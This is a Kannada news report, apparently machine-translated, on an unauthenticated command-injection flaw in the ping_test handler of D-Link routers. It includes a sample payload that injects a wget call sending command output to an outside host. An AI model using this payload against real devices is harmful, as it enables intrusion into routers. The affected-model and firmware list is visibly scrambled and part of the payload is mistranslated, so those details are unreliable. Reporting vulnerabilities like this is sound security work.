ಡಿ-ಲಿಂಕ್ ವೈರ್ಲೆಸ್ ರೂಟರ್ಗಳಲ್ಲಿ ಅಪಾಯಕಾರಿ ದುರ್ಬಲತೆ (), "ಪಿಂಗ್_ಟೆಸ್ಟ್" ಹ್ಯಾಂಡ್ಲರ್ಗೆ ವಿಶೇಷ ವಿನಂತಿಯನ್ನು ಕಳುಹಿಸುವ ಮೂಲಕ ಸಾಧನದ ಬದಿಯಲ್ಲಿ ರಿಮೋಟ್ ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ, ದೃಢೀಕರಣವಿಲ್ಲದೆ ಪ್ರವೇಶಿಸಬಹುದು.
ಕುತೂಹಲಕಾರಿಯಾಗಿ, ಫರ್ಮ್ವೇರ್ ಡೆವಲಪರ್ಗಳ ಪ್ರಕಾರ, "ping_test" ಕರೆಯನ್ನು ದೃಢೀಕರಣದ ನಂತರ ಮಾತ್ರ ಕಾರ್ಯಗತಗೊಳಿಸಬೇಕು, ಆದರೆ ವಾಸ್ತವದಲ್ಲಿ ಇದನ್ನು ವೆಬ್ ಇಂಟರ್ಫೇಸ್ಗೆ ಲಾಗ್ ಇನ್ ಮಾಡದೆಯೇ ಯಾವುದೇ ಸಂದರ್ಭದಲ್ಲಿ ಕರೆಯಲಾಗುತ್ತದೆ. ನಿರ್ದಿಷ್ಟವಾಗಿ, apply_sec.cgi ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಪ್ರವೇಶಿಸುವಾಗ ಮತ್ತು “action=ping_test” ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ಹಾದುಹೋಗುವಾಗ, ಸ್ಕ್ರಿಪ್ಟ್ ದೃಢೀಕರಣ ಪುಟಕ್ಕೆ ಮರುನಿರ್ದೇಶಿಸುತ್ತದೆ, ಆದರೆ ಅದೇ ಸಮಯದಲ್ಲಿ ping_test ಗೆ ಸಂಬಂಧಿಸಿದ ಕ್ರಿಯೆಯನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ. ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು, ping_test ನಲ್ಲಿಯೇ ಮತ್ತೊಂದು ದುರ್ಬಲತೆಯನ್ನು ಬಳಸಲಾಗಿದೆ, ಇದು ಪರೀಕ್ಷೆಗೆ ಕಳುಹಿಸಲಾದ IP ವಿಳಾಸದ ಸರಿಯಾದತೆಯನ್ನು ಸರಿಯಾಗಿ ಪರಿಶೀಲಿಸದೆಯೇ ಪಿಂಗ್ ಉಪಯುಕ್ತತೆಯನ್ನು ಕರೆಯುತ್ತದೆ. ಉದಾಹರಣೆಗೆ, wget ಯುಟಿಲಿಟಿಗೆ ಕರೆ ಮಾಡಲು ಮತ್ತು "echo 1234" ಆಜ್ಞೆಯ ಫಲಿತಾಂಶಗಳನ್ನು ಬಾಹ್ಯ ಹೋಸ್ಟ್ಗೆ ವರ್ಗಾಯಿಸಲು, "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಿ. test.test/?$( ಎಕೋ 1234)".
ಈ ಕೆಳಗಿನ ಮಾದರಿಗಳಲ್ಲಿ ದುರ್ಬಲತೆಯ ಉಪಸ್ಥಿತಿಯನ್ನು ಅಧಿಕೃತವಾಗಿ ದೃಢೀಕರಿಸಲಾಗಿದೆ:
- ಫರ್ಮ್ವೇರ್ 655b3.02 ಅಥವಾ ಹಳೆಯದರೊಂದಿಗೆ DIR-05;
- ಫರ್ಮ್ವೇರ್ 866b1.03 ಅಥವಾ ಅದಕ್ಕಿಂತ ಹೆಚ್ಚಿನದರೊಂದಿಗೆ DIR-04L;
- ಫರ್ಮ್ವೇರ್ 1565 ಅಥವಾ ಅದಕ್ಕಿಂತ ಹೆಚ್ಚಿನದರೊಂದಿಗೆ DIR-1.01;
- DIR-652 (ಸಮಸ್ಯೆಯ ಫರ್ಮ್ವೇರ್ ಆವೃತ್ತಿಗಳ ಡೇಟಾವನ್ನು ಒದಗಿಸಲಾಗಿಲ್ಲ)
ಈ ಮಾದರಿಗಳಿಗೆ ಬೆಂಬಲ ಅವಧಿಯು ಈಗಾಗಲೇ ಮುಕ್ತಾಯಗೊಂಡಿದೆ, ಆದ್ದರಿಂದ ಡಿ-ಲಿಂಕ್ , ಇದು ದುರ್ಬಲತೆಯನ್ನು ತೊಡೆದುಹಾಕಲು ಅವರಿಗೆ ನವೀಕರಣಗಳನ್ನು ಬಿಡುಗಡೆ ಮಾಡುವುದಿಲ್ಲ, ಅವುಗಳನ್ನು ಬಳಸಲು ಶಿಫಾರಸು ಮಾಡುವುದಿಲ್ಲ ಮತ್ತು ಅವುಗಳನ್ನು ಹೊಸ ಸಾಧನಗಳೊಂದಿಗೆ ಬದಲಿಸಲು ಸಲಹೆ ನೀಡುತ್ತದೆ. ಭದ್ರತಾ ಪರಿಹಾರವಾಗಿ, ನೀವು ವೆಬ್ ಇಂಟರ್ಫೇಸ್ಗೆ ಪ್ರವೇಶವನ್ನು ವಿಶ್ವಾಸಾರ್ಹ IP ವಿಳಾಸಗಳಿಗೆ ಮಾತ್ರ ನಿರ್ಬಂಧಿಸಬಹುದು.
ದುರ್ಬಲತೆಯೂ ಆಗಿರುವುದು ನಂತರ ಪತ್ತೆಯಾಯಿತು ಮಾದರಿಗಳು DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ಮತ್ತು DIR-825, ನವೀಕರಣಗಳನ್ನು ಬಿಡುಗಡೆ ಮಾಡುವ ಯೋಜನೆಗಳು ಇನ್ನೂ ತಿಳಿದಿಲ್ಲ.
ಮೂಲ: opennet.ru